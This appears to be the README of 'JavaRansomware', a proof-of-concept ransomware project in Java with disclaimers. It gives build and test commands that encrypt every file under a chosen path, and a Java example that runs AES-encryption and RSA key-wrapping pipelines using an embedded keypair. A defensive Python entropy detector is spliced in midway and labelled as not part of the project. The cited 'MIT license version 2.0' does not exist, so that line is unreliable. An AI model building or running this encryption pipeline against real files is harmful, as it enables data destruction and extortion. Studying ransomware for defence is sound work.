Security
Special thanks to my followers for supporting me:
Warning
This project is intended solely for educational and research purposes.
Do not use it on any system without explicit permission. Using code like this to compromise systems or data without authorization is illegal and unethical.
JavaRansomware is a proof-of-concept cryptographic ransomware application written in pure Java. It demonstrates how a malicious actor might encrypt files on a target machine, hold them for ransom, and only decrypt them upon certain conditions. Ransomware is malware for data kidnapping, an exploit in which the attacker encrypts the victim's files and stops the victim from accessing them.
As a teaching tool, this repository illustrates common ransomware tactics:
Again, this software is provided for educational and research insights into how ransomware threats operate, so security professionals, researchers, and students can better understand and defend against them.
There are different types of ransomware. However, all of them will prevent you from using your PC normally, and they will all ask you to do something before you can use your PC. They can target any PC users, whether it’s a home computer, endpoints in an enterprise network, or servers used by a government agency or healthcare provider.
Ransomware can:
Prevent you from accessing Windows.
Encrypt files so you can't use them.
Stop certain apps from running (like your web browser).
Ransomware will demand that you pay money (a “ransom”) to get access to your PC or files. We have also seen them make you complete surveys. There is no guarantee that paying the fine or doing what the ransomware tells you will give access to your PC or files again.
Symmetric Encryption (AES-256)
Asymmetric Key Protection (RSA-4096)
Configurable File Paths
Simple Command-Line Interface
Educational-Focused
File Discovery
AES Key Generation
RSA Public Key Encryption
AES File Encryption
(Optional) Logging/DB
RSA Private Key
AES File Decryption
This project aims to build an almost functional crypto-ransomware for educational purposes, written in pure Java. It encrypts your files in the background using AES-256, a strong encryption algorithm, uses an RSA-4096 public key to secure the AES symmetric key, and stores it in an embedded database.
Assume that there is a C&C server that stores the ID and the respective encryption key and may act as a command-and-control server in the near future.
For educational purposes, I will not provide the full server source code described in the previous paragraph. Instead, imagine a simple testing example in which the client has the asymmetric encryption keys by default.
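Seen from the defender's side, the in-place AES encryption described above leaves a measurable trace: file contents become near-random and stop matching their extension. The following detection sketch is an added example, not part of the JavaRansomware project; the entropy threshold, the constructed sample data and all function names are assumptions made for illustration.

```python
import hashlib
import math
import os
from collections import Counter

MAGIC = {".pdf": b"%PDF", ".png": b"\x89PNG", ".zip": b"PK\x03\x04", ".jpg": b"\xff\xd8\xff"}
TEXT_EXTS = {".txt", ".csv", ".log", ".md"}
ENTROPY_THRESHOLD = 7.2  # bits per byte; assumed cut-off, tune on your own data


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: roughly 4-5 for English text, close to 8 for ciphertext."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def looks_encrypted(name: str, head: bytes) -> bool:
    """Flag content that is near-random and no longer matches its extension."""
    if shannon_entropy(head) < ENTROPY_THRESHOLD:
        return False
    ext = os.path.splitext(name)[1].lower()
    if ext in MAGIC:  # compressed formats are high-entropy too, so check the header
        return not head.startswith(MAGIC[ext])
    return ext in TEXT_EXTS  # plain text should never look random


def scan(samples: dict, alert_ratio: float = 0.5):
    """Return (flagged names, alert); alert signals a mass-encryption pattern."""
    flagged = sorted(n for n, d in samples.items() if looks_encrypted(n, d[:4096]))
    return flagged, bool(samples) and len(flagged) / len(samples) >= alert_ratio


def fake_ciphertext(n: int) -> bytes:
    """Constructed stand-in for AES output: deterministic pseudo-random bytes."""
    blocks = (hashlib.sha256(i.to_bytes(4, "big")).digest() for i in range(n // 32 + 1))
    return b"".join(blocks)[:n]


# Constructed sample data: two intact files, two that look encrypted in place.
SAMPLES = {
    "notes.txt": b"The quarterly report is attached.\n" * 100,
    "report.pdf": b"%PDF-1.7\n" + fake_ciphertext(4000),
    "budget.csv": fake_ciphertext(4096),
    "scan.pdf": fake_ciphertext(4096),
}

if __name__ == "__main__":
    print(scan(SAMPLES))
```

In practice the same check would be fed the first few kilobytes of recently modified files, with the alert ratio evaluated over a short time window.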
The easiest way to run this project is to run the commands below.
$ mvn clean install
Run the following test to encrypt all files in the path given in the example test file, and wait until execution has finished.
mvn -Dtest=MyTest ExampleTest test
DON'T RUN JavaRansomware.jar ON YOUR PERSONAL MACHINE. EXECUTE IT ONLY IN A TEST ENVIRONMENT (VMWARE)!
If you want to use the project programmatically, put the code below in your project and run it. Don't forget to set the input path before executing it.
JDK 21 is required to build and run this project.
package com.security;

import java.nio.file.Path;
import java.nio.file.Paths;
import java.security.GeneralSecurityException;

public class Example {
    private static final String PubicKey = "MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBAJCw1HHQooCFGsGhtxNrsdS6dDq5jtfHqqLInCj7qFlDaD/Sll5+BAUjV0GU/c+6PVyMKzmLrHh49eeGQy1ETN8CAwEAAQ==";
    private static final String PrivateKey = "MIIBVAIBADANBgkqhkiG9w0BAQEFAASCAT4wggE6AgEAAkEAkLDUcdCigIUawaG3E2ux1Lp0OrmO18eqosicKPuoWUNoP9KWXn4EBSNXQZT9z7o9XIwrOYuseHj154ZDLURM3wIDAQABAkA9AnLx8tkye+2GTBwYEkcPvfcYc/mpPsXSkehW15Zq3IALx3Kr5GgKGOaB2FK6PU0QzEPQbNJXdA5ZPjwTDcQBAiEA1/zINRVlrLpw2HPfqsYQ8ZSDuG2rVUUKKmKgJQXeQ98CIQCrfsw2+VKOaFoJm5BpVxIT5nsE8CXn4fr/WSFuklMXAQIgTKWnAreCKmbLTvTn5bl+H8zdZaB9kbf7YIk5XYoUky8CIQCL2ccnPYK5ZxelphrKDJtNZzMC/+OpiXtqKIE+7kycAQIgRK/DUhWUgSQV5u7VoCHDyLPCntjFMGBsg7Wi1uq+EDM=";

    public static void main(String[] args) throws RansomwareException, GeneralSecurityException {
        // Set Whatever path you want to test
        Path testPath = Paths.get("C:\\Users\\User\\Documents\\GitHub\\JavaRansomware\\src\\resources");
        //Path testPath = Paths.get(Objects.requireNonNull(ExampleTest.class.getResource("/test.txt")).toURI());
        PipelineData pipelineData = new PipelineData();
        pipelineData.setPrivateKey(PrivateKey);
        pipelineData.setPublicKey(PubicKey);
        // Alternative Gen RSA. Make sure you save the keypair to a file if not loaded
        // RSAGenKeyReader.StringKeyPair keyPair=RSAGenKeyReader.generateKeyPair();
        // pipelineData.setPrivateKey(keyPair.privateKey());
        // pipelineData.setPublicKey(keyPair.publicKey());
        pipelineData.setRootPath(testPath.toAbsolutePath().toString());

        Pipeline<PipelineData, PipelineData> encrypt_filters = new Pipeline<PipelineData, PipelineData>(new DatabaseRetrieveHandler())
                .addHandler(new GenSymmetricKeyHandler())
                .addHandler(new RansomwareEncryptHandler())
                .addHandler(new EncryptKeyHandler())
                .addHandler(new DatabaseStoreHandler());
        var encrypt_output = encrypt_filters.execute(pipelineData);
        System.out.println("Pipeline encrypt_output: " + encrypt_output);

        Pipeline<PipelineData, PipelineData> decrypt_filters = new Pipeline<PipelineData, PipelineData>(new DatabaseRetrieveHandler())
                .addHandler(new DecryptKeyHandler())
                .addHandler(new RansomwareDecryptHandler())
                .addHandler(new DecryptKeyHandler());
        var decrypt_output = decrypt_filters.execute(pipelineData);
        System.out.println("Pipeline output: " + decrypt_output);
    }
}
While this may be helpful for some, there are significant risks. JavaRansomware may be used only for educational purposes. Do not use it as ransomware! You could go to jail if you use it for malicious purposes.
For support, email panagiotisdrakatos@gmail.com or join me on Discord: panos5427. If you liked using this app or it has helped you in any way, I'd like you to send me an email about anything you'd want to say about this software. I'd really appreciate it!
git checkout -b my-new-feature
git commit -am 'Add some feature'
git push origin my-new-feature
This project is distributed under the MIT license version 2.0 (see the LICENSE file in the project root).
By submitting a pull request to this project, you agree to license your contribution under the MIT license version 2.0 to this project.